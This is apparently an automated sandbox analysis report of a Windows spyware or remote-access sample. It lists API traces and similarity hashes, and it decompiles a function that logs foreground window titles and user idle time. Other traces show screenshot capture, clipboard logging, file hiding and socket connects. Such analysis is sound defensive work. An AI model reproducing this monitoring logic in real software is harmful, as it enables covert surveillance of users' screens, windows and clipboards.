                                  • CreateDirectoryW.KERNEL32(00000000), ref: 00405646
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00405651
                                  • GetFileAttributesW.KERNEL32(00000000), ref: 00405658
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00405669
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 00405670
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405681
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 00405690
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040569D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056AA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004056C5
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004056D0
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056DC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004056F0
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 004056F7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405708
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405714
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405729
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040574D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405756
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405733
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040575F
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040576F
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405778
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405782
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040579A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004057AA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057BB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057C4
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 004057D1
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 004057E2
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000006), ref: 004057F1
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 004057F8
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$File$??0?$basic_string@$??1?$basic_string@V01@@$?length@?$basic_string@$?data@?$basic_string@AttributesCreateD@1@@V01@$??4?$basic_string@Sleep$??9std@@?empty@?$basic_string@CloseD@2@@0@DirectoryExistsHandlePathSizeV?$basic_string@Y?$basic_string@
                                  • String ID:
                                  • API String ID: 3042614570-0
                                  • Opcode ID: 575ddf90373583570e2370749e334e5a8c8c652185d1d6edf2812296b84c8a7a
                                  • Instruction ID: c86808d706488c02b7588af0601caf96bbb35f31f7bc76b7b462248bc21621a9
                                  • Opcode Fuzzy Hash: 575ddf90373583570e2370749e334e5a8c8c652185d1d6edf2812296b84c8a7a
                                  • Instruction Fuzzy Hash: B0514E72A00909EBCB05ABA0ED5DADE7B78EF84315F04807AF503A71A0DF745A45CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F5F4, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 265COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                    • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                    • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F676
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040F680
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040F70C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040F72F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040F755
                                  • _itoa.MSVCRT ref: 0040F75C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                    • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                    • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                    • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                    • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,0041B310,?,0041B310,0041C0C8,0041B310,00000000,00000000,?,?,?,0041BF08), ref: 0040F7EF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,0041BF08), ref: 0040F7FF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,0041BF08), ref: 0040F80F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F81F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F82C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F83C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F84C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000010), ref: 0040F86D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F879
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F882
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F88E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F89A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8A6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8B2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8BE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F856
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004D,?,?,?,?,?,?), ref: 0040F900
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F909
                                    • Part of subcall function 0040F984: GdipDisposeImage.GDIPLUS(?,00410AE2), ref: 0040F98D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@V10@0@$D@1@@$?size@?$basic_string@CreateG@2@@std@@G@std@@V01@@$?begin@?$basic_string@?c_str@?$basic_string@_itoa$?end@?$basic_string@?length@?$basic_string@CompatibleDisposeGdipImageThreadV10@@connectsocket
                                  • String ID: image/jpeg
                                  • API String ID: 2742309606-3785015651
                                  • Opcode ID: b0730c79e71e437cfddf2c56560b672f6144d9d155c94930c0d9f44daa166224
                                  • Instruction ID: 2cf9f006c0d4929ef9c332e6db0d7f76cf60b2cff1cc21eb26a78d91115eee6c
                                  • Opcode Fuzzy Hash: b0730c79e71e437cfddf2c56560b672f6144d9d155c94930c0d9f44daa166224
                                  • Instruction Fuzzy Hash: 74915172900109ABDB10EFA1DC49EEF7B7CEF54304F00847AF916A7191EB745A49CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004059BE, Relevance: 50.9, APIs: 25, Strings: 4, Instructions: 158sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E004059BE(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				intOrPtr _v12;
				signed int _v16;
				char _v28;
				char _v44;
				char _v60;
				char _v76;
				void* _v92;
				intOrPtr _t41;
				int _t43;
				CHAR* _t45;
				signed int _t48;
				char* _t58;
				char* _t59;
				struct HWND__* _t93;
				intOrPtr _t94;
				void* _t99;
				intOrPtr _t112;

				_v12 = __ecx;
				while(1) {
					_t41 = _v12;
					if( *((intOrPtr*)(_t41 + 0x3c)) == 0 &&  *((intOrPtr*)(_t41 + 0x3d)) == 0) {
						break;
					}
					if(( *0x41b990 & 0x00000001) == 0) {
						 *0x41b990 =  *0x41b990 | 0x00000001;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
						E00413E72(E00405BB5);
					}
					Sleep(0x1f4);
					_t93 = GetForegroundWindow();
					_t43 = GetWindowTextLengthA(_t93);
					_t95 = _t43;
					_t9 = _t95 + 1; // 0x1
					_t45 = _t9;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z(_t45, 0,  &_v6);
					if(_t43 != 0) {
						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
						GetWindowTextA(_t93, _t45, _t45);
						_t58 =  &_v44;
						__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t58, 0x41b998);
						if(_t58 == 0) {
							_t59 =  &_v44;
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t59);
							__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
							__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z(_t59 - 1);
							_t112 =  *0x41b93e; // 0x0
							if(_t112 == 0) {
								_t103 = _t99 - 0x10;
								L00414176();
								L00414170();
								_t99 = _t99 - 0x10 + 0x18;
								E004054E9(_v12, _t103,  &_v60,  &_v60, "\r\n[ ",  &_v44);
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(" ]\r\n", 0);
							} else {
								_t99 = _t99 - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
								E00405DD3(_v12,  &_v44);
							}
						}
					}
					_t94 = _v12;
					_t71 = _t94;
					E00406C35(_t94);
					if(E0041269B(_t94) < 0xea60) {
						L16:
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						continue;
					} else {
						while( *((intOrPtr*)(_t94 + 0x3c)) != 0 ||  *((intOrPtr*)(_t94 + 0x3d)) != 0) {
							_t48 = E0041269B(_t71);
							if(_t48 < 0xea60) {
								__imp___itoa(_v16 / 0xea60,  &_v28, 0xa);
								_t101 = _t99 + 0xc - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v28,  &_v7, " minutes }\r\n", 0);
								L00414176();
								L00414170();
								_t99 = _t99 + 0xc - 0x10 + 0x18;
								E004054E9(_t94, _t101,  &_v76,  &_v76, "\r\n{ User has been idle for ",  &_v28);
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
								goto L16;
							}
							_v16 = _t48;
							Sleep(0x3e8);
						}
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						break;
					}
				}
				return 0;
			}























                                  0x004059c7
                                  0x004059cc
                                  0x004059cc
                                  0x004059d2
                                  0x00000000
                                  0x00000000
                                  0x004059e4
                                  0x004059e6
                                  0x004059f6
                                  0x00405a01
                                  0x00405a06
                                  0x00405a0c
                                  0x00405a18
                                  0x00405a1b
                                  0x00405a21
                                  0x00405a28
                                  0x00405a28
                                  0x00405a2f
                                  0x00405a37
                                  0x00405a40
                                  0x00405a4a
                                  0x00405a52
                                  0x00405a58
                                  0x00405a61
                                  0x00405a6b
                                  0x00405a6d
                                  0x00405a76
                                  0x00405a7f
                                  0x00405a8a
                                  0x00405a90
                                  0x00405a96
                                  0x00405ab5
                                  0x00405ac9
                                  0x00405ad3
                                  0x00405adb
                                  0x00405ade
                                  0x00405ae6
                                  0x00405a98
                                  0x00405a98
                                  0x00405aa1
                                  0x00405aaa
                                  0x00405aaa
                                  0x00405a96
                                  0x00405a6b
                                  0x00405aec
                                  0x00405aef
                                  0x00405af1
                                  0x00405b02
                                  0x00405b97
                                  0x00405b9a
                                  0x00000000
                                  0x00405b08
                                  0x00405b08
                                  0x00405b16
                                  0x00405b1d
                                  0x00405b3d
                                  0x00405b4d
                                  0x00405b5c
                                  0x00405b6c
                                  0x00405b76
                                  0x00405b7b
                                  0x00405b80
                                  0x00405b88
                                  0x00405b91
                                  0x00000000
                                  0x00405b91
                                  0x00405b24
                                  0x00405b27
                                  0x00405b27
                                  0x00405ba8
                                  0x00000000
                                  0x00405ba8
                                  0x00405b02
                                  0x00405bb4

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004059F6
                                  • Sleep.KERNEL32(000001F4), ref: 00405A0C
                                  • GetForegroundWindow.USER32 ref: 00405A12
                                  • GetWindowTextLengthA.USER32(00000000), ref: 00405A1B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 00405A2F
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A40
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405A4A
                                  • GetWindowTextA.USER32 ref: 00405A52
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B998), ref: 00405A61
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00405A76
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A7F
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00405A8A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405AA1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,?, ],?,?,00000000), ref: 00405AC9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ],?,?,00000000), ref: 00405AD3
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                    • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                    • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                    • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405AE6
                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?, ],?,?,00000000), ref: 00405B27
                                  • _itoa.MSVCRT ref: 00405B3D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B5C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B6C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00405B76
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B88
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B91
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B9A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405BA8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V01@@$D@1@@V01@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                                  • String ID: [ ${ User has been idle for $ ]$ minutes }
                                  • API String ID: 615312007-3343415809
                                  • Opcode ID: 5f570c7ad1d30cb41594ba76545dd26972d348bd779eaad3ce5967d6990f75db
                                  • Instruction ID: 24516c956339191e20f1f3c27382aafae9a0e704c06eebb7e5bf761840e1d674
                                  • Opcode Fuzzy Hash: 5f570c7ad1d30cb41594ba76545dd26972d348bd779eaad3ce5967d6990f75db
                                  • Instruction Fuzzy Hash: CC517072900609EBCB00EBA0DC899EF7F78EF44315F04407AE502E7191EB785989CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041093F, Relevance: 49.1, APIs: 25, Strings: 3, Instructions: 131fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                    • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                    • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                    • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                    • Part of subcall function 0040F925: GdipLoadImageFromStreamICM.GDIPLUS(00000000,?,00000000), ref: 0040F942
                                    • Part of subcall function 0040FE07: malloc.MSVCRT ref: 0040FE2E
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                    • Part of subcall function 00410AF7: GdipSaveImageToFile.GDIPLUS(?,004109D1,?,00000000,00000000,?,004109D1,00000000), ref: 00410B09
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                  • DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
